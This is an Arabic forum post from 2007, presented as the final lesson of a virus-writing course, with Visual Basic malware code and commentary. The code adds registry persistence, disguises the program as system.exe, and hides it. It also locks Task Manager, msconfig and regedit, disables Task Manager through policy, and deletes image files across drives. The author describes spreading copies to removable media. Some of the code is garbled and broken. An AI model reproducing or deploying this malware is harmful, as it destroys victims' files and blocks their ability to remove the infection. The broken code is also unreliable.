عرض مشاركة واحدة
قديم 12-10-2007, 07:53 PM   رقم المشاركة : 14 (permalink)
معلومات العضو
AbO-Ra3d
root@localhost
 
الصورة الرمزية AbO-Ra3d
 

 

 
إحصائية العضو






AbO-Ra3d غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
AbO-Ra3d is on a distinguished road

افتراضي


الدرس الثامن والاخير في الدورة



صناعة الفايروسات تحتاج الي ذكاء والي تفكير والي احتمالات
ذكاء يعني ذكاء الفايروس كيف يعمل ماذا يفعل كيف يحمي نفسه كيف يراوغ
تفكير اي فكر كيف تصنع فايروس وذكي يصعب السيطره عليه
احتمالات تعني احتمال الضحيه يعمل فرومات يعني الفايروس رايح ينحذف طيب وين اخليه يتخبأ مثل ينسخ نفسه في الدي
اووووووووووه طيب افرض الضحيه فرمت حتى الدي ه لقيت فكره رائعه اخليه بنسخ نفسه في الفلاش مموري و القرص المرن وهكذا
طيب الفلاش مموري حرف القرص يتغير من جهاز الي جهاز ربما يكون g ربما يكون e ربما يكون حرف اخر
ماشي اعمل شفرة نسخ الي اكثر من حرف واحطه باداة تايمر مع وضع شفرة تخطى الاخطاء وهكذا
================================================== =======
الفكره هو ان يقوم الفايروس بنقل نفسه الي مجلد مهم في الجهاز ثم يغير اسمه الي اسم مهم مثل windows او system
او taskmagr وهكذا حاول ان تخلي اسمه يحسس الضحيه بانه تابع لنظام
وبعد ما يتمركز الفايروس في مجلد مهم يقوم بالخطوه الثاني وهي نسخ نفسه الي عدة مجلدات والي عدة محركات اقراص
مثل الدي والفلاش مموري والقرص المرن
================================================== =======
حماية الفايروس شي مهم جدا جدا حتى لايحذف
حماية الفايروس يجب ان نحميه مثل ماذكرت سابق من ثلاث برامج وهي ( قائمة المهام + الريجتسري + بدأ الشتغيل)
================================================== ========
دعونا الان نبدا بصناعة فايروس قوى جدا ومتعدد المهام
اولا يجب ان نضع هذه الشفرات في اجراء الفورم وهذا شي اساس لكل فايروس تصنعه لابد ان تضع هذه الشفرات في كل
مره تصنع فيها فايروس

كود PHP:
Private Sub Form_Load()
Set O = CreateObject("WScript.Shell")
O.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Cur r entVersion\Run\ProgramName", "c:\WINDOWS\system32\system.exe", "REG_SZ"
Form1.Hide
Name App.Path & "\" & App.EXEName & ".exe" As "c:WINDOWSsystem32system.exe"
SetAttr "c:WINDOWSsystem32system.exe", vbHidden
Open "C:WINDOWSsystem32taskmgr.exe" For Input Lock Read As 1
Open "C:WINDOWSpchealthhelpctrbinariesmsconfig.exe" For Input Lock Read As 1
Open "C:WINDOWSregedit.exe" For Input Lock Read As 1
End Sub

هذه الشفرات يجب ان تضعها في كل مره تصنع فيها فايروس وتحطها في اجراء الفورم
اول شفره تشغيل الفايروس مع تشغيل الجهاز
ثاني شفره قمنا باخفاء الفايروس اي النافذه
ثالث شفره قمنا بنقل الفايروس الي مجلد system32 وتغيير اسمه الي system ويعني الفايروس تمركز في هذا المجلد
رابع شفره تم اخفاء الفايروس اي اعطاءه خاصية التخفي
الشفره الخامسه والسادسه والسابعه حمينا الفايروس من برنامج قائمة المهام و بدا الشتغيل و الريجتسري
================================================== =======
هناك شفره تقوم بتعطيل قائمة المهام نهائيا وهي تتعامل مع الريجتسري اي تغير قيمة قائمة المهام الي 1 مما يجعلها تتعطل

كود PHP:
Const HKCU = &H80000001
Set objReg = GetObject("winmgmts:\\.\root\" & _
"Default:StdRegProv")
strKeyPath = "SoftwareMicrosoftWindowsCurrentVersionPoliciesSys tem"
objReg.Createkey HKCU, "SoftwareMicrosoftWindowsCurrentVersionPoliciesSys tem"
objReg.SetDwordValue HKCU, strKeyPath, "DisableTaskMgr", 1

هذه الشفره تقوم بتعطيل قائمة المهام لاحظ رقم واحد في اخر الشفره معناه تعطيل قائمة المهام وعندما تضغط على
ctrl+alt+del تظهر لك رساله من النظام تقول ان قائمة المهام معطله من قبل المسؤول
ولكن عندما تشيل رقم واحد وتحط صفر سوف تعمل قائمة المهام من جديد
هذه الشفره فقط تصلح لنظام اكس بي فقط
================================================== ===
الان دعونا نصنع اوامر الفايروس
اول امر للفايروس هو حذف الصور اللي بامتداد gif في جميع اركان الجهاز
ضع اداة تايمر وجعل العداد فيها يساوي 1000
ولا تنسى وضع textbox على الفروم ايضا
واكتب هذا الكود في اجراء التايمر

كود PHP:
Private Sub Timer1_Timer()
If Minute(Time) = 1 Then
Text1.Text = "QJgJI-pJLc "
ElseIf Dir("d:\*.gif") <> "" Then
Kill "d:\*.gif"
Else
Text1.Text = "QJgJI-pJLc "
ElseIf Dir("d:\*.jpg") <> "" Then
Kill "d:\*jpg"
Else
Text1.Text = "QJgJI-pJLc "
ElseIf Dir("c:\*.jpg") <> "" Then
Kill "c:\*.jpg"
Else
Text1.Text = "QJgJI-pJLc "
ElseIf Dir("c:\*.gif") <> "" Then
Kill "c:\*.gif"
Else
Text1.Text = "QJgJI-pJLc "
ElseIf Dir("a:\*.gif") <> "" Then
Kill "a:\*.gif"
Else
Text1.Text = "QJgJI-pJLc "
ElseIf Dir("a:\*.jpg") <> "" Then
Kill "a:\*.jpg"
Else
Text1.Text = "QJgJI-pJLc "
ElseIf Dir("e:\*.gif") <> "" Then
Kill "e:\*.gif"
Else
Text1.Text = "QJgJI-pJLc "
ElseIf Dir("e:\*.jpg") <> "" Then
Kill "e:\*.jpg"
Else
Text1.Text = "QJgJI-pJLc "
ElseIf Dir("g:\*.gif") <> "" Then
Kill "g:\*.gif"
Else
Text1.Text = "QJgJI-pJLc "
ElseIf Dir("g:\*.jpg") <> "" Then
Kill "g:\*.jpg"
Else
End
End If
End Sub
End Sub

================================================== =======
دعونا نشرح الشفرات الطويله هذه رغم انها متشابهه لكن الاختلاف بمكان الحذف
If Minute(Time) = 1 Then
Text1.Text = "QJgJI-pJLc "
عندما تكون الساعه 1:1 و 2:1 و 3:1 و4:1 الي اخره قم بتنفيذ الشرط
Text1.Text = "QJgJI-pJLc " هذا شرط انا وضعته لسد الفراغ فقط يعني حيله برمجيه لان ملقيت شرط احطه
فاوضعت اكتب عالم الوله في التيسكت بوكس
حتى يقوم باكمال بقية الشروط اذا وضع عالم الوله في textbox يقوم باكمال بقية الشروط
======================================
ElseIf Dir("d:\*.gif") <> "" Then ابحث في الدي عن صور بامتداد gif اذا وجدها سوف ينفذ الشرط
Kill "d:\*.gif" قم بحذف الصور بامتداد if
Else حقق الشرط الثاني اذا لم يتحقق الشرط الاول وهو قم بوضع عالم الوله في التيكست بوكس
Text1.Text = "QJgJI-pJLc "
وبعدها يكمل بقية الشروط بدون اي اخطاء
==================================

كود PHP:
Private Sub Timer1_Timer()
On Error GoTo Cont:
If Minute(Time) = 1 Then
Kill "d:\*.gif"
Kill "d:\*jpg"
Kill "c:\*.gif"
Kill "c:\*.jpg"
Kill "e:\*.gif"
Kill "e:\*.jpg"
Kill "g:\*.gif"
Kill "g:\*.jpg"
End If
Cont:
End Sub

جرب هذا الكود افضل الاول فعلا فيه اخطاء ويحتاج الي تعديل
لاحظ في اخر شرط حطيت الشرط الثاني end اي سوف يتم ايقاف الفايروس
ولن يعمل الا في المره القادمه عند تشغيل الجهاز